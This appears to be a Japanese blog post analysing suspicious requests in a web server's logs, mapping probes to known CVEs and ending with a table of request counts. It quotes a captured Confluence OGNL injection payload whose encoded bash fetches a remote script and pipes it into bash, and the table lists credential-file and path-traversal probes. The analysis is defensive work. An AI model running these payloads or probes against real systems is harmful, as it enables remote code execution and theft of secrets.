公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
Atlassian Confluence の脆弱性(CVE-2022-26134)を利用してスクリプトを実行しようとしていると思われるリクエスト
Confluence ゼロデイ(CVE-2022-26134)に対する Akamai の所見
/$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/
Cisco 製 Cisco IOS XE などのネットワーク機器の Web UI の脆弱性
下記の記事のようなネットワーク機器のWeb UIにアクセスを試みる通信だと思われます。
Cisco 製 Cisco IOS XE の Web UI の脆弱性について(CVE-2023-20198 等) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
/webui/
GeoServerの脆弱性
GeoServer の深刻な脆弱性 CVE-2023-35042 が FIX:RCE 攻撃が観測されている – IoT OT Security News
/geoserver/web/
e-Vision CMS の style.php における SQL インジェクションの脆弱性
JVNDB-2007-002188 - JVN iPedia - 脆弱性対策情報データベース
/style.php
Spring Frameworkの脆弱性
Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
/actuator/gateway/routes
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Apple OS X Server の Web サーバにおける重要な設定情報を取得される脆弱性
Apple OS X Server の Web サーバは、.DS_Store および .htaccess ファイルへのアクセスを適切に制限しないため、重要な設定情報を取得される脆弱性が存在するらしいです。
JVNDB-2016-001873 - JVN iPedia - 脆弱性対策情報データベース
/.DS_Store
laravelの脆弱性を利用した攻撃
詳しくはわからないのですが、laravelの脆弱性をつく際に送られる通信みたいです。
laravelのヤバい脆弱性をついたkinsing(kdevtmpfsi)というマルウェアに感染した話 CVE-2021-3129 #PHP - Qiita
/_ignition/execute-solution
不審な通信の一覧
| uri | count |
|---|---|
| /.env | 450 |
| /sw.js | 370 |
| / | 366 |
| /ads.txt | 214 |
| /.git/config | 192 |
| /$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/ | 171 |
| mstshash=Administr | 146 |
| * | 138 |
| /wp-login.php | 107 |
| /app-ads.txt | 94 |
| /webui/ | 61 |
| /geoserver/web/ | 58 |
| /style.php | 52 |
| /actuator/gateway/routes | 49 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 44 |
| /sellers.json | 39 |
| /.DS_Store | 37 |
| /.well-known/security.txt | 32 |
| /.vscode/sftp.json | 32 |
| /_ignition/execute-solution | 31 |
| /docker/.env | 30 |
| 12.1.2 | 25 |
| /api/.env | 25 |
| //.env | 25 |
| /manager/html | 24 |
| /inputs.php | 24 |
| /dns-query | 24 |
| /local/.env | 23 |
| //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 23 |
| /core/.env | 22 |
| /admin/config.php | 21 |
| /config.json | 20 |
| /aab8 | 20 |
| /_profiler/phpinfo | 20 |
| /redmine/.env | 19 |
| /info.php | 19 |
| /admin/assets/js/pbxlib.js | 19 |
| //wp-content/ | 19 |
| /index.php | 18 |
| /admin.php | 18 |
| /.env.production | 18 |
| /.env.prod | 18 |
| /system/.env | 17 |
| /debug/default/view?panel=config | 17 |
| /actuator/health | 17 |
| /HNAP1 | 17 |
| /xmlrpc.php?rsd | 16 |
| /sources/.env | 16 |
| /sftp-config.json | 16 |
| /sdk | 16 |
| /script/.env | 16 |
| /private/.env | 16 |
| /phpinfo.php | 16 |
| /main.php | 16 |
| /logon.htm | 16 |
| /fedex/.env | 16 |
| /enviroments/.env.production | 16 |
| /enviroments/.env | 16 |
| /cp/.env | 16 |
| /cms/.env | 16 |
| /back/.env | 16 |
| /application/.env | 16 |
| /.env.save | 16 |
| /.env.dist | 16 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 15 |
| /login | 15 |
| /libs/js/iframe.js | 15 |
| /index.jsp | 15 |
| /.aws/credentials | 15 |
| /wp-content/ | 14 |
| /shared/.env%20 | 14 |
| /rest/.env | 14 |
| /menu.php | 14 |
| /live_env%20 | 14 |
| /laravel/.env%20 | 14 |
| /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application | 14 |
| /development/.env%20 | 14 |
| /cgi-bin/login.cgi | 14 |
| /boaform/admin/formLogin | 14 |
| /apps/.env%20 | 14 |
| /app/.env%20 | 14 |
| /admin-app/.env%20 | 14 |
| /.git/HEAD | 14 |
| /.env.old | 14 |
| /.env.development%20 | 14 |
| /wp1/wp-includes/wlwmanifest.xml | 13 |
| /wp/wp-includes/wlwmanifest.xml | 13 |
| /wordpress/wp-includes/wlwmanifest.xml | 13 |
| /web/wp-includes/wlwmanifest.xml | 13 |
| /test/wp-includes/wlwmanifest.xml | 13 |
| /site/wp-includes/wlwmanifest.xml | 13 |
| /login.jsp | 13 |
| /cms/wp-includes/wlwmanifest.xml | 13 |
| /blog/wp-includes/wlwmanifest.xml | 13 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 13 |
| /aaa9 | 13 |
| //pagead2.googlesyndication.com/pagead/js/adsbygoogle.js | 13 |
| /.env.project%20 | 13 |
| /+CSCOE+/logon.html | 13 |
| 7 | 12 |
| /wp2/wp-includes/wlwmanifest.xml | 12 |
| /wp-includes/wlwmanifest.xml | 12 |
| /wp | 12 |
| /wordpress/ | 12 |
| /wordpress | 12 |
| /website/wp-includes/wlwmanifest.xml | 12 |
| /start.pl | 12 |
| /start.php | 12 |
| /start.jhtml | 12 |
| /start.html | 12 |
| /start.cgi | 12 |
| /sito/wp-includes/wlwmanifest.xml | 12 |
| /shop/wp-includes/wlwmanifest.xml | 12 |
| /rest/applinks/1.0/manifest | 12 |
| /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession | 12 |
| /readme.txt | 12 |
| /pools/default/buckets | 12 |
| /pools | 12 |
| /old | 12 |
| /news/wp-includes/wlwmanifest.xml | 12 |
| /new | 12 |
| /menu.shtml | 12 |
| /menu.jsa | 12 |
| /menu.cgi | 12 |
| /main.pl | 12 |
| /main.jsa | 12 |
| /main.jhtml | 12 |
| /main.cgi | 12 |
| /main.asp | 12 |
| /localstart.shtml | 12 |
| /localstart.jsa | 12 |
| /localstart.jhtml | 12 |
| /localstart.html | 12 |
| /localstart.cgi | 12 |
| /localstart.cfm | 12 |
| /inicio.jsa | 12 |
| /inicio.jhtml | 12 |
| /inicio.html | 12 |
| /inicio.cgi | 12 |
| /inicio.cfm | 12 |
| /indice.pl | 12 |
| /indice.jsa | 12 |
| /indice.jhtml | 12 |
| /indice.cfm | 12 |
| /index.pl | 12 |
| /index.aspx | 12 |
| /index.asp | 12 |
| /home.html | 12 |
| /home.aspx | 12 |
| /docs/cplugError.html/ | 12 |
| /doc/index.html | 12 |
| /default.pl | 12 |
| /default.php | 12 |
| /default.jsp | 12 |
| /default.jhtml | 12 |
| /default.html | 12 |
| /confluence/rest/applinks/1.0/manifest | 12 |
| /client/get_targets | 12 |
| /base.shtml | 12 |
| /base.php | 12 |
| /base.jsa | 12 |
| /base.jhtml | 12 |
| /base.inc | 12 |
| /base.cfm | 12 |
| /base.aspx | 12 |
| /base.asp | 12 |
| /admin/index.html | 12 |
| /admin.shtml | 12 |
| /admin.pl | 12 |
| /admin.jsa | 12 |
| /admin.html | 12 |
| /admin.cgi | 12 |
| /admin.aspx | 12 |
| /admin.asp | 12 |
| /__Additional | 12 |
| /Portal0000.htm | 12 |
| /Portal/Portal.mwsl | 12 |
| /CSS/Miniweb.css | 12 |
| /.well-known/assetlinks.json | 12 |
| /.well-known/apple-app-site-association | 12 |
| /start.jsa | 11 |
| /start.asp | 11 |
| /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ | 11 |
| /phpinfo | 11 |
| /menu.pl | 11 |
| /menu.jsp | 11 |
| /menu.jhtml | 11 |
| /menu.aspx | 11 |
| /menu.asp | 11 |
| /manage/account/login | 11 |
| /main.shtml | 11 |
| /main.jsp | 11 |
| /main.html | 11 |
| /main.aspx | 11 |
| /login.action | 11 |
| /localstart.pl | 11 |
| /localstart.php | 11 |
| /localstart.jsp | 11 |
| /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 11 |
| /lib/phpunit/src/Util/PHP/eval-stdin.php | 11 |
| /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 11 |
| /lib/phpunit/phpunit/Util/PHP/eval-stdin.php | 11 |
| /lib/phpunit/Util/PHP/eval-stdin.php | 11 |
| /inicio.shtml | 11 |
